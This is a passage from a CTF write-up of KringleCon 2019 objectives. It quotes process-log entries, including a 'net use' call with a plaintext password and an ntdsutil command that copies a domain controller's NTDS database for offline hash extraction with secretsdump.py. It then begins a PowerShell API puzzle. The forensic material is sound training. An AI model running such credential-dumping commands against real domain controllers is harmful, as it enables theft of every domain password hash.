    &lt;span class="nt"&gt;&amp;quot;subtype&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;create&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;timestamp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;132186397042960000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de58-5dd3-0000-00104dbd2600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de52-5dd3-0000-0010dea72600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY\\SYSTEM&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_domain&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SYSTEM&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nt"&gt;&amp;quot;command_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net  use \\\\127.0.0.1\\IPC$ /user:ELFU\\civypears ???Summer2019  &amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nt"&gt;&amp;quot;event_type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;process&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;logon_id&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;999&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2848&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1072&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\SysWOW64\\net.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;subtype&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;create&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;timestamp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;132186397043230000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de58-5dd3-0000-0010c1c12600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-de52-5dd3-0000-0010dea72600}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY\\SYSTEM&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_domain&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SYSTEM&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But the last event is the most interesting one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="nt"&gt;&amp;quot;command_line&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;ntdsutil.exe  \&amp;quot;ac i ntds\&amp;quot; ifm \&amp;quot;create full c:\\hive\&amp;quot; q q&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/span&gt;    &lt;span class="nt"&gt;&amp;quot;event_type&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;process&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;logon_id&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;999&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;parent_process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\System32\\cmd.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3556&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3440&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;ntdsutil.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;process_path&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;C:\\Windows\\System32\\ntdsutil.exe&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;subtype&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;create&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;timestamp&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;132186398470300000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_pid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-dee7-5dd3-0000-0010f0c44f00}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;unique_ppid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;{7431d376-dedb-5dd3-0000-001027be4f00}&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY\\SYSTEM&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_domain&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;NT AUTHORITY&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;user_name&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;SYSTEM&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;ntdsutil.exe&lt;/code&gt; can be used to create a full back-up of the
&lt;code&gt;ntds.dit&lt;/code&gt; hive on a domain controller. This file can then be parsed with
something like &lt;a class="reference external" href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"&gt;secretsdump.py&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I first thought that this was not the correct answer, because, as I understand
it, &lt;code&gt;ntdsutil.exe&lt;/code&gt; does not interact with the &lt;code&gt;lsass.exe&lt;/code&gt; to
extract password hashes: an external tool must be used to extract these hashes.
Then, after analyzing the rest of the log file, I didn't see any other tool
that could be used to extract hashes. So I tried to answer
&lt;code&gt;ntdsutil.exe&lt;/code&gt;, but was given an error message by the KringleCon form.&lt;/p&gt;
&lt;p&gt;It turns out that the correct solution is &lt;code&gt;ntdsutil&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-5"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id11"&gt;Objective 5:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="sparkle-redberry-s-canberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id12"&gt;Sparkle Redberry's Canberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, the research lab at Elf U is building a laser that can shoot beams
of Christmas cheer. However, someone apparently messed with the parameters, and
now the laser is not producing enough Mega-Jollies per liter.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;WARNGING: ctrl + c restricted in this terminal - Do not use endless loops&lt;/span&gt;
&lt;span class="go"&gt;Type exit to exit PowerShell.&lt;/span&gt;
&lt;span class="go"&gt;PowerShell 6.2.3&lt;/span&gt;
&lt;span class="go"&gt;Copyright (c) Microsoft Corporation. All rights reserved.&lt;/span&gt;
&lt;span class="go"&gt;https://aka.ms/pscore6-docs&lt;/span&gt;
&lt;span class="go"&gt;Type &amp;#39;help&amp;#39; to get help.&lt;/span&gt;
&lt;span class="go"&gt;🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲                                                                                🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Elf University Student Research Terminal - Christmas Cheer Laser Project       🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 ------------------------------------------------------------------------------ 🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 The research department at Elf University is currently working on a top-secret 🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Laser which shoots laser beams of Christmas cheer at a range of hundreds of    🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 miles. The student research team was successfully able to tweak the laser to   🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 JUST the right settings to achieve 5 Mega-Jollies per liter of laser output.   🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Unfortunately, someone broke into the research terminal, changed the laser     🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 settings through the Web API and left a note behind at /home/callingcard.txt.  🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Read the calling card and follow the clues to find the correct laser Settings. 🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Apply these correct settings to the laser using it&amp;#39;s Web API to achieve laser  🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 output of 5 Mega-Jollies per liter.                                            🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲                                                                                🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲 Use (Invoke-WebRequest -Uri http://localhost:1225/).RawContent for more info.  🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲                                                                                🗲&lt;/span&gt;
&lt;span class="go"&gt;🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲🗲&lt;/span&gt;
&lt;span class="go"&gt;PS /home/elf&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's try to find the correct value for the different parameters. Let's start
with the &lt;code&gt;Invoke-WebRequest&lt;/code&gt; command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Invoke-WebRequest&lt;/span&gt; &lt;span class="n"&gt;-Uri&lt;/span&gt; &lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;localhost&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;1225&lt;/span&gt;&lt;span class="p"&gt;/).&lt;/span&gt;&lt;span class="n"&gt;RawContent&lt;/span&gt;
&lt;span class="go"&gt;HTTP/1.0 200 OK&lt;/span&gt;
&lt;span class="go"&gt;Server: Werkzeug/0.16.0&lt;/span&gt;
&lt;span class="go"&gt;Server: Python/3.6.9&lt;/span&gt;
&lt;span class="go"&gt;Date: Mon, 23 Dec 2019 20:01:04 GMT&lt;/span&gt;
&lt;span class="go"&gt;Content-Type: text/html; charset=utf-8&lt;/span&gt;
&lt;span class="go"&gt;Content-Length: 860&lt;/span&gt;

&lt;span class="go"&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;pre&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;----------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;Christmas Cheer Laser Project Web API&lt;/span&gt;
&lt;span class="go"&gt;----------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;Turn the laser on/off:&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/on&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/off&lt;/span&gt;

&lt;span class="go"&gt;Check the current Mega-Jollies of laser output&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/output&lt;/span&gt;

&lt;span class="go"&gt;Change the lense refraction value (1.0 - 2.0):&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/refraction?val=1.0&lt;/span&gt;

&lt;span class="go"&gt;Change laser temperature in degrees Celsius:&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/temperature?val=-10&lt;/span&gt;

&lt;span class="go"&gt;Change the mirror angle value (0 - 359):&lt;/span&gt;
&lt;span class="go"&gt;GET http://localhost:1225/api/angle?val=45.1&lt;/span&gt;

&lt;span class="go"&gt;Change gaseous elements mixture:&lt;/span&gt;
&lt;span class="go"&gt;POST http://localhost:1225/api/gas&lt;/span&gt;
&lt;span class="go"&gt;POST BODY EXAMPLE (gas mixture percentages):&lt;/span&gt;
&lt;span class="go"&gt;O=5&amp;amp;H=5&amp;amp;He=5&amp;amp;N=5&amp;amp;Ne=20&amp;amp;Ar=10&amp;amp;Xe=10&amp;amp;F=20&amp;amp;Kr=10&amp;amp;Rn=10&lt;/span&gt;
&lt;span class="go"&gt;----------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/pre&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, there is an API available on the research lab computer, where we can
change the value of the different parameters of the laser. So, once we find the
correct values for the laser's parameters, we'll input them here.&lt;/p&gt;
&lt;p&gt;Now, let's take a look at this calling card file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;home&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;callingcard&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;txt&lt;/span&gt;
&lt;span class="go"&gt;What&amp;#39;s become of your dear laser?&lt;/span&gt;
&lt;span class="go"&gt;Fa la la la la, la la la la&lt;/span&gt;
&lt;span class="go"&gt;Seems you can&amp;#39;t now seem to raise her!&lt;/span&gt;
&lt;span class="go"&gt;Fa la la la la, la la la la&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Could commands hold riddles in hist&amp;#39;ry?&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Fa la la la la, la la la la&lt;/span&gt;
&lt;span class="go"&gt;Nay! You&amp;#39;ll ever suffer myst&amp;#39;ry!&lt;/span&gt;
&lt;span class="go"&gt;Fa la la la la, la la la la&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The calling card seems to imply that we can find some riddles in the command
history. So let's dig into it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;get-history&lt;/span&gt;

&lt;span class="go"&gt;  Id CommandLine&lt;/span&gt;
&lt;span class="go"&gt;  -- -----------&lt;/span&gt;
&lt;span class="go"&gt;   1 Get-Help -Name Get-Process&lt;/span&gt;
&lt;span class="go"&gt;   2 Get-Help -Name Get-*&lt;/span&gt;
&lt;span class="go"&gt;   3 Set-ExecutionPolicy Unrestricted&lt;/span&gt;
&lt;span class="go"&gt;   4 Get-Service | ConvertTo-HTML -Property Name, Status &amp;gt; C:\services.htm&lt;/span&gt;
&lt;span class="go"&gt;   5 Get-Service | Export-CSV c:\service.csv&lt;/span&gt;
&lt;span class="go"&gt;   6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;   7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;   8 Get-EventLog -Log &amp;quot;Application&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;   9 I have many name=value variables that I share to applications system wide. At a com…&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We've found the correct value for the angle, which seems to be &lt;code&gt;65.5&lt;/code&gt;.
The ninth entry also seems interesting, let's take a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;get-history&lt;/span&gt; &lt;span class="n"&gt;-id&lt;/span&gt; &lt;span class="n"&gt;9&lt;/span&gt;  &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;format-list&lt;/span&gt;

&lt;span class="go"&gt;Id                 : 9&lt;/span&gt;
&lt;span class="go"&gt;CommandLine        : I have many name=value variables that I share to applications&lt;/span&gt;
&lt;span class="go"&gt;                     system wide. At a command I will reveal my secrets once you Get my&lt;/span&gt;
&lt;span class="go"&gt;                     Child Items.&lt;/span&gt;
&lt;span class="go"&gt;ExecutionStatus    : Completed&lt;/span&gt;
&lt;span class="go"&gt;StartExecutionTime : 11/29/19 4:57:16 PM&lt;/span&gt;
&lt;span class="go"&gt;EndExecutionTime   : 11/29/19 4:57:16 PM&lt;/span&gt;
&lt;span class="go"&gt;Duration           : 00:00:00.6090308&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Sharing &lt;code&gt;name=value&lt;/code&gt; variables system wide... This seems to point to
&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Environment_variable"&gt;environment variables&lt;/a&gt;.
Let's explore the environment variables, using the &lt;code&gt;env:&lt;/code&gt; object:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;

&lt;span class="go"&gt;Name                           Value&lt;/span&gt;
&lt;span class="go"&gt;----                           -----&lt;/span&gt;
&lt;span class="go"&gt;_                              /bin/su&lt;/span&gt;
&lt;span class="go"&gt;DOTNET_SYSTEM_GLOBALIZATION_I… false&lt;/span&gt;
&lt;span class="go"&gt;HOME                           /home/elf&lt;/span&gt;
&lt;span class="go"&gt;HOSTNAME                       ed982fcad65c&lt;/span&gt;
&lt;span class="go"&gt;LANG                           en_US.UTF-8&lt;/span&gt;
&lt;span class="go"&gt;LC_ALL                         en_US.UTF-8&lt;/span&gt;
&lt;span class="go"&gt;LOGNAME                        elf&lt;/span&gt;
&lt;span class="go"&gt;MAIL                           /var/mail/elf&lt;/span&gt;
&lt;span class="go"&gt;PATH                           /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bi…&lt;/span&gt;
&lt;span class="go"&gt;PSModuleAnalysisCachePath      /var/cache/microsoft/powershell/PSModuleAnalysisCache/Mod…&lt;/span&gt;
&lt;span class="go"&gt;PSModulePath                   /home/elf/.local/share/powershell/Modules:/usr/local/shar…&lt;/span&gt;
&lt;span class="go"&gt;PWD                            /home/elf&lt;/span&gt;
&lt;span class="go"&gt;RESOURCE_ID                    f8a577fa-4565-46c9-a2b6-5ab85e9da0e1&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;riddle                         Squeezed and compressed I am hidden away. Expand me from …&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;SHELL                          /home/elf/elf&lt;/span&gt;
&lt;span class="go"&gt;SHLVL                          1&lt;/span&gt;
&lt;span class="go"&gt;TERM                           xterm&lt;/span&gt;
&lt;span class="go"&gt;USER                           elf&lt;/span&gt;
&lt;span class="go"&gt;USERDOMAIN                     laserterminal&lt;/span&gt;
&lt;span class="go"&gt;userdomain                     laserterminal&lt;/span&gt;
&lt;span class="go"&gt;username                       elf&lt;/span&gt;
&lt;span class="go"&gt;USERNAME                       elf&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;riddle&lt;/code&gt; variable seems interesting. Let's expand it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="n"&gt;env&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;riddle&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Format-List&lt;/span&gt;

&lt;span class="go"&gt;Name  : riddle&lt;/span&gt;
&lt;span class="go"&gt;Value : Squeezed and compressed I am hidden away. Expand me from my prison and I will&lt;/span&gt;
&lt;span class="go"&gt;        show you the way. Recurse through all /etc and Sort on my LastWriteTime to&lt;/span&gt;
&lt;span class="go"&gt;        reveal im the newest of all.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, let's list every file in &lt;code&gt;/etc&lt;/code&gt; and sort by their
&lt;code&gt;LastWriteTime&lt;/code&gt; attribute:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-ChildItem&lt;/span&gt; &lt;span class="n"&gt;-recurse&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;sort &lt;/span&gt;&lt;span class="n"&gt;LastWriteTime&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;    Directory: /etc/apt&lt;/span&gt;

&lt;span class="go"&gt;Mode                LastWriteTime         Length Name&lt;/span&gt;
&lt;span class="go"&gt;----                -------------         ------ ----&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;--r---          12/23/19  8:35 PM        5662902 archive&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The newest file seems to be an archive. Let's extract it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Expand-Archive&lt;/span&gt; &lt;span class="n"&gt;-Path&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;apt&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;archive&lt;/span&gt; &lt;span class="n"&gt;-DestinationPath&lt;/span&gt; &lt;span class="n"&gt;extracted_archive&lt;/span&gt;
&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;dir&lt;/span&gt;
&lt;span class="go"&gt;Directory: /home/elf&lt;/span&gt;

&lt;span class="go"&gt;Mode                LastWriteTime         Length Name&lt;/span&gt;
&lt;span class="go"&gt;----                -------------         ------ ----&lt;/span&gt;
&lt;span class="go"&gt;d-r---          12/13/19  5:15 PM                depths&lt;/span&gt;
&lt;span class="go"&gt;d-----          12/23/19  8:37 PM                extracted_archive&lt;/span&gt;
&lt;span class="go"&gt;--r---          12/13/19  4:29 PM           2029 motd&lt;/span&gt;
